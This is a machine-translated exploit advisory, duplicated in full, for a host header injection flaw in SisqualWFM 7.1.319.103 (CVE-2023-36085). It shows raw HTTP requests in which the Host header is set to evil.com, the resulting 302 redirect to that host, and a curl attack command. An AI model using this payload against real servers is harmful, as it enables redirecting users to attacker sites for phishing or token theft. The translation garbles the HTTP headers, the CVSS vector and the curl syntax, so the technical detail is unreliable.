#利用标题: Sisqualwfm 7.1.319.103主机注入
#发现的日期: 17/03/2023
#报告日期: 17/03/2023
#解决日期: 13/10/2023
#利用作者: OMER SHAIK(UNKNOWN_EXPLOIT)
#供应商homepage3360 https://www.sisqualwfm.com
#版本: 7.1.319.103
#测试在: Sisqual WFM 7.1.319.103
#受影响的版本: Sisqualwfm -7.1.319.103
#固定版本: Sisqualwfm -7.1.319.111
#CVE : CVE-2023-36085
#CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C3:L/I:L/I:L/A333660N
#类别: Web应用程序
概念验证(POC)方案,展示了SisqualWFM版本7.1.319.103中潜在的主机标头注入漏洞,专门针对/sisqualidentityServer /core端点。攻击者可以利用这种漏洞来操纵网页链接或将用户轻松地将用户重定向到另一个站点,只需篡改主机标头即可。
*********************************************************************************************************************************************************************
Orignal请求
*********************************************************************************************************************************************************************
get/sisqualidentityServer/core/login http/2
HOST: SISQUALWFM.CLOUD
cookie:cookie
sec-ch-ua:'不是(品牌'; v='24','chromium'; v='110'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/110.0.5481.78 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
*********************************************************************************************************************************************************************
Orignal响应
*********************************************************************************************************************************************************************
发现HTTP/2 302
cache-control:无存储,无缓存,必须恢复活力
Location: https://sisqualwfm.cloud/sisqualidentityserver/core/
strict-transport-security: max-age=31536000;包括Ububdomains;预付
X-content-type-options: nosniff
X-Frame-Options: Sameorigin
Date:星期三,2023年3月22日133:22:10 GMT
内容长度: 0
*********************************************************************************************************************************************************************
██████╗██████╗
██╔══█████╔═════╖████╔═══╝
██████╔╝██║██████╔╝██║
██╔═══╝██║
██║██║
╚═╝╚══════╝
*********************************************************************************************************************************************************************
已修改请求将用户重定向到evil.com(使用Burp代理截取的请求)
*********************************************************************************************************************************************************************
get/sisqualidentityServer/core/login http/2
HOST: Evil.com
cookie:cookie
sec-ch-ua:'不是(品牌'; v='24','chromium'; v='110'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/110.0.5481.78 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
*********************************************************************************************************************************************************************
回复
*********************************************************************************************************************************************************************
发现HTTP/2 302
cache-control:无存储,无缓存,必须恢复活力
位置: https://evil.com/sisqualidentityserver/core/
strict-transport-security: max-age=31536000;包括Ububdomains;预付
X-content-type-options: nosniff
X-Frame-Options: Sameorigin
内容长度: 0
*********************************************************************************************************************************************************************
攻击方法
*********************************************************************************************************************************************************************
curl -K -HEADER'HOST: ATTEST.HOST.COM''域名+ /sisqualidentityServer /core'-vvv
*********************************************************************************************************************************************************************
#发现的日期: 17/03/2023
#报告日期: 17/03/2023
#解决日期: 13/10/2023
#利用作者: OMER SHAIK(UNKNOWN_EXPLOIT)
#供应商homepage3360 https://www.sisqualwfm.com
#版本: 7.1.319.103
#测试在: Sisqual WFM 7.1.319.103
#受影响的版本: Sisqualwfm -7.1.319.103
#固定版本: Sisqualwfm -7.1.319.111
#CVE : CVE-2023-36085
#CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C3:L/I:L/I:L/A333660N
#类别: Web应用程序
概念验证(POC)方案,展示了SisqualWFM版本7.1.319.103中潜在的主机标头注入漏洞,专门针对/sisqualidentityServer /core端点。攻击者可以利用这种漏洞来操纵网页链接或将用户轻松地将用户重定向到另一个站点,只需篡改主机标头即可。
*********************************************************************************************************************************************************************
Orignal请求
*********************************************************************************************************************************************************************
get/sisqualidentityServer/core/login http/2
HOST: SISQUALWFM.CLOUD
cookie:cookie
sec-ch-ua:'不是(品牌'; v='24','chromium'; v='110'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/110.0.5481.78 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
*********************************************************************************************************************************************************************
Orignal响应
*********************************************************************************************************************************************************************
发现HTTP/2 302
cache-control:无存储,无缓存,必须恢复活力
Location: https://sisqualwfm.cloud/sisqualidentityserver/core/
strict-transport-security: max-age=31536000;包括Ububdomains;预付
X-content-type-options: nosniff
X-Frame-Options: Sameorigin
Date:星期三,2023年3月22日133:22:10 GMT
内容长度: 0
*********************************************************************************************************************************************************************
██████╗██████╗
██╔══█████╔═════╖████╔═══╝
██████╔╝██║██████╔╝██║
██╔═══╝██║
██║██║
╚═╝╚══════╝
*********************************************************************************************************************************************************************
已修改请求将用户重定向到evil.com(使用Burp代理截取的请求)
*********************************************************************************************************************************************************************
get/sisqualidentityServer/core/login http/2
HOST: Evil.com
cookie:cookie
sec-ch-ua:'不是(品牌'; v='24','chromium'; v='110'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/110.0.5481.78 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
*********************************************************************************************************************************************************************
回复
*********************************************************************************************************************************************************************
发现HTTP/2 302
cache-control:无存储,无缓存,必须恢复活力
位置: https://evil.com/sisqualidentityserver/core/
strict-transport-security: max-age=31536000;包括Ububdomains;预付
X-content-type-options: nosniff
X-Frame-Options: Sameorigin
内容长度: 0
*********************************************************************************************************************************************************************
攻击方法
*********************************************************************************************************************************************************************
curl -K -HEADER'HOST: ATTEST.HOST.COM''域名+ /sisqualidentityServer /core'-vvv
*********************************************************************************************************************************************************************